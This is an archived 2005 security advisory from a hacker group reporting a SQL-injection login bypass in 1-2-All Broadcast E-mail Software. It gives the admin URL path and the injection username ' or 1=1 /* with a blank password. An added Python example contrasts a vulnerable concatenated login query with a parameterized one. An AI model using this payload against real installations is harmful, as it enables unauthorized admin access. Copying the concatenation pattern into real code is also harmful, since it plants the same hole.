1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

bhs_teamyahoo.com
Date: Fri Nov 11 2005 - 13:52:41 CST


1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)

Report By : POPO
>From>IRAN> www.Babol-Hackers.com
bhs_teamyahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
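
Added example (not part of the original post, and not the product's own code): why the reported username is accepted when a login query is built by string concatenation, next to the same query using bind parameters. The table, column and function names are hypothetical, and SQLite stands in for the product's database; SQLite treats an unterminated /* as a comment running to the end of the input.

```python
import hashlib
import sqlite3

APP_SALT = b"constructed-demo-salt"  # constructed; password storage is simplified here

def pw_hash(password: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), APP_SALT, 100_000).hex()

def make_db() -> sqlite3.Connection:
    # Hypothetical schema and account; the product's real tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, pw TEXT NOT NULL)")
    db.execute("INSERT INTO admins VALUES (?, ?)", ("admin", pw_hash("s3cret-example")))
    return db

def login_concatenated(db, username: str, password: str) -> bool:
    # Assumed vulnerable pattern: the form field becomes part of the SQL text,
    # so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND pw = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username: str, password: str) -> bool:
    # Bind parameters: the driver passes both values as data, never as SQL.
    sql = "SELECT username FROM admins WHERE username = ? AND pw = ?"
    return db.execute(sql, (username, pw_hash(password))).fetchone() is not None

REPORTED_USERNAME = "' or 1=1 /*"  # the username string from the report above

def compare() -> dict:
    db = make_db()
    return {
        "concatenated, reported input": login_concatenated(db, REPORTED_USERNAME, ""),
        "parameterized, reported input": login_parameterized(db, REPORTED_USERNAME, ""),
        "parameterized, valid login": login_parameterized(db, "admin", "s3cret-example"),
        "parameterized, wrong password": login_parameterized(db, "admin", "wrong"),
    }

if __name__ == "__main__":
    for case, accepted in compare().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

With bind parameters the reported string is looked up as a literal username, matches no row, and the login is rejected.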